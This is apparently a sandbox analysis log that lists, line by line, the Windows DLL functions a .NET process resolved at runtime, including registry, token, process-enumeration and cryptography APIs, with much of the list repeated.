DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetUserDefaultUILanguage
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetVersionEx
DynamicLoader: kernel32.dll/GetVersionExW
DynamicLoader: kernel32.dll/GetFullPathName
DynamicLoader: kernel32.dll/GetFullPathNameW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: kernel32.dll/GetFileAttributesEx
DynamicLoader: kernel32.dll/GetFileAttributesExW
DynamicLoader: kernel32.dll/SetErrorMode
DynamicLoader: version.dll/GetFileVersionInfoSize
DynamicLoader: version.dll/GetFileVersionInfoSizeW
DynamicLoader: version.dll/GetFileVersionInfo
DynamicLoader: version.dll/GetFileVersionInfoW
DynamicLoader: version.dll/VerQueryValue
DynamicLoader: version.dll/VerQueryValueW
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: mscoree.dll/ND_RI2
DynamicLoader: mscoreei.dll/ND_RI2_RetAddr
DynamicLoader: mscoreei.dll/ND_RI2
DynamicLoader: kernel32.dll/lstrlen
DynamicLoader: kernel32.dll/lstrlenW
DynamicLoader: kernel32.dll/lstrcpy
DynamicLoader: kernel32.dll/lstrcpyW
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: version.dll/VerLanguageName
DynamicLoader: version.dll/VerLanguageNameW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GetCurrentProcessId
DynamicLoader: kernel32.dll/GetCurrentProcessIdW
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValue
DynamicLoader: ADVAPI32.dll/LookupPrivilegeValueW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivileges
DynamicLoader: ADVAPI32.dll/AdjustTokenPrivilegesW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/OpenProcess
DynamicLoader: kernel32.dll/OpenProcessW
DynamicLoader: PSAPI.DLL/EnumProcessModules
DynamicLoader: PSAPI.DLL/EnumProcessModulesW
DynamicLoader: PSAPI.DLL/GetModuleInformation
DynamicLoader: PSAPI.DLL/GetModuleInformationW
DynamicLoader: PSAPI.DLL/GetModuleBaseName
DynamicLoader: PSAPI.DLL/GetModuleBaseNameW
DynamicLoader: PSAPI.DLL/GetModuleFileNameEx
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetExitCodeProcessW
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtQuerySystemInformationW
DynamicLoader: USER32.dll/EnumWindows
DynamicLoader: USER32.dll/EnumWindowsW
DynamicLoader: USER32.dll/GetWindowThreadProcessId
DynamicLoader: USER32.dll/GetWindowThreadProcessIdW
DynamicLoader: kernel32.dll/WerSetFlags
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguagesW
DynamicLoader: kernel32.dll/GetUserDefaultLocaleName
DynamicLoader: kernel32.dll/GetUserDefaultLocaleNameW
DynamicLoader: kernel32.dll/GetEnvironmentVariable
DynamicLoader: kernel32.dll/GetEnvironmentVariableW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegOpenKeyEx
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegQueryValueEx
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/CryptCreateHash
DynamicLoader: ADVAPI32.dll/CryptDestroyHash
DynamicLoader: ADVAPI32.dll/CryptHashData
DynamicLoader: ADVAPI32.dll/CryptGetHashParam
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptVerifySignatureA
DynamicLoader: ADVAPI32.dll/CryptSignHashA
DynamicLoader: ADVAPI32.dll/CryptGetProvParam
DynamicLoader: ADVAPI32.dll/CryptGetUserKey
DynamicLoader: ADVAPI32.dll/CryptEnumProvidersA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptHashData
DynamicLoader: CRYPTSP.dll/CryptGetHashParam
DynamicLoader: CRYPTSP.dll/CryptDestroyHash
DynamicLoader: CRYPTSP.dll/CryptDestroyKey
DynamicLoader: mscoreei.dll/_CorDllMain_RetAddr
DynamicLoader: mscoreei.dll/_CorDllMain
DynamicLoader: mscoree.dll/GetTokenForVTableEntry
DynamicLoader: mscoree.dll/SetTargetForVTableEntry
DynamicLoader: mscoree.dll/GetTargetForVTableEntry
DynamicLoader: mscoreei.dll/LoadLibraryShim_RetAddr
DynamicLoader: mscoreei.dll/LoadLibraryShim
DynamicLoader: culture.dll/ConvertLangIdToCultureName
DynamicLoader: ole32.dll/CoCreateGuid
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfo
DynamicLoader: kernel32.dll/GetConsoleScreenBufferInfoW
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetCurrentProcessW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenProcessTokenW
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformationW
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: kernel32.dll/LocalAllocW
DynamicLoader: mscoree.dll/ND_RI4
DynamicLoader: mscoreei.dll/ND_RI4_RetAddr
DynamicLoader: mscoreei.dll/ND_RI4
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenExW
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/CheckTokenMembershipW
DynamicLoader: kernel32.dll/GetConsoleTitle
DynamicLoader: kernel32.dll/GetConsoleTitleW
DynamicLoader: mscorjit.dll/getJit
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: kernel32.dll/SetConsoleTitle
DynamicLoader: kernel32.dll/SetConsoleTitleW
DynamicLoader: kernel32.dll/SetConsoleCtrlHandler
DynamicLoader: kernel32.dll/SetConsoleCtrlHandlerW
DynamicLoader: kernel32.dll/CreateEvent
DynamicLoader: kernel32.dll/CreateEventW
DynamicLoader: ntdll.dll/WinSqmIsOptedIn
DynamicLoader: kernel32.dll/ExpandEnvironmentStrings
DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW
DynamicLoader: shfolder.dll/SHGetFolderPath
DynamicLoader: shfolder.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/SetEnvironmentVariable
DynamicLoader: kernel32.dll/SetEnvironmentVariableW
DynamicLoader: kernel32.dll/GetACP
DynamicLoader: kernel32.dll/UnmapViewOfFile
DynamicLoader: kernel32.dll/CreateFile
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetFileType
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/GetSystemInfo
DynamicLoader: kernel32.dll/VirtualQuery
DynamicLoader: ADVAPI32.dll/RegQueryInfoKey
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumValue
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegEnumKeyEx
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: secur32.dll/GetUserNameEx
DynamicLoader: secur32.dll/GetUserNameExW
DynamicLoader: ADVAPI32.dll/GetUserName
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: kernel32.dll/ReleaseMutex
DynamicLoader: ADVAPI32.dll/RegisterEventSource
DynamicLoader: ADVAPI32.dll/RegisterEventSourceW
DynamicLoader: ADVAPI32.dll/DeregisterEventSource
DynamicLoader: ADVAPI32.dll/ReportEvent
DynamicLoader: ADVAPI32.dll/ReportEventW
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/GetDriveType
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/GetVolumeInformation
DynamicLoader: kernel32.dll/GetVolumeInformationW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: kernel32.dll/GetCurrentDirectory
DynamicLoader: kernel32.dll/GetCurrentDirectoryW
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/GetTokenForVTableEntry
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry_RetAddr
DynamicLoader: mscoreei.dll/SetTargetForVTableEntry
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/LocalAlloc
DynamicLoader: mscoree.dll/IEE
DynamicLoader: kernel32.dll/GetStdHandle
DynamicLoader: kernel32.dll/GetStdHandleW
DynamicLoader: kernel32.dll/GetConsoleMode
DynamicLoader: kernel32.dll/GetConsoleModeW
DynamicLoader: kernel32.dll/SetEvent
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/SetThreadUILanguageW
DynamicLoader: kernel32.dll/FindFirstFile
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: CRYPTSP.dll/CryptExportKey
DynamicLoader: CRYPTSP.dll/CryptCreateHash
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: mscoree.dll/CorExitProcess
DynamicLoader: mscoreei.dll/CorExitProcess_RetAddr
DynamicLoader: mscoreei.dll/CorExitProcess
DynamicLoader: mscorwks.dll/CorExitProcess
DynamicLoader: mscorwks.dll/_CorDllMain
DynamicLoader: kernel32.dll/CreateActCtxW
DynamicLoader: kernel32.dll/AddRefActCtx
DynamicLoader: kernel32.dll/ReleaseActCtx
DynamicLoader: kernel32.dll/ActivateActCtx
DynamicLoader: kernel32.dll/DeactivateActCtx
DynamicLoader: kernel32.dll/GetCurrentActCtx
DynamicLoader: kernel32.dll/QueryActCtxW
DynamicLoader: netutils.dll/NetApiBufferFree
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: kernel32.dll/SetThreadUILanguage
DynamicLoader: kernel32.dll/CopyFileExW
DynamicLoader: kernel32.dll/IsDebuggerPresent
DynamicLoader: kernel32.dll/SetConsoleInputExeNameW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: LINKINFO.dll/IsValidLinkInfo
DynamicLoader: propsys.dll/
DynamicLoader: propsys.dll/PSGetNameFromPropertyKey
DynamicLoader: propsys.dll/PSStringFromPropertyKey
DynamicLoader: propsys.dll/InitVariantFromBuffer
DynamicLoader: OLEAUT32.dll/
DynamicLoader: propsys.dll/PropVariantToGUID
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/GetSecurityDescriptorControl
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
DynamicLoader: mscorwks.dll/IEE
DynamicLoader: mscoree.dll/GetStartupFlags
DynamicLoader: mscoreei.dll/GetStartupFlags_RetAddr
DynamicLoader: mscoreei.dll/GetStartupFlags
DynamicLoader: mscoree.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetHostConfigurationFile_RetAddr
DynamicLoader: mscoreei.dll/GetHostConfigurationFile
DynamicLoader: mscoreei.dll/GetCORVersion_RetAddr
DynamicLoader: mscoreei.dll/GetCORVersion
DynamicLoader: mscoree.dll/GetCORSystemDirectory
DynamicLoader: mscoreei.dll/GetCORSystemDirectory_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream_RetAddr
DynamicLoader: mscoreei.dll/CreateConfigStream
DynamicLoader: ntdll.dll/RtlVirtualUnwind
DynamicLoader: kernel32.dll/IsWow64Process
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/InitializeAcl
DynamicLoader: ADVAPI32.dll/AddAccessAllowedAce
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: kernel32.dll/SetThreadStackGuarantee
DynamicLoader: kernel32.dll/FlsSetValue
DynamicLoader: kernel32.dll/FlsGetValue
DynamicLoader: kernel32.dll/FlsAlloc
DynamicLoader: kernel32.dll/FlsFree
DynamicLoader: kernel32.dll/AddVectoredContinueHandler
DynamicLoader: kernel32.dll/RemoveVectoredContinueHandler
DynamicLoader: ADVAPI32.dll/ConvertSidToStringSidW
DynamicLoader: shell32.dll/SHGetFolderPathW
DynamicLoader: kernel32.dll/FlushProcessWriteBuffers
DynamicLoader: kernel32.dll/GetWriteWatch
DynamicLoader: kernel32.dll/ResetWriteWatch
DynamicLoader: kernel32.dll/CreateMemoryResourceNotification
DynamicLoader: kernel32.dll/QueryMemoryResourceNotification
DynamicLoader: kernel32.dll/GlobalMemoryStatusEx
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CoGetContextToken
DynamicLoader: OLEAUT32.dll/
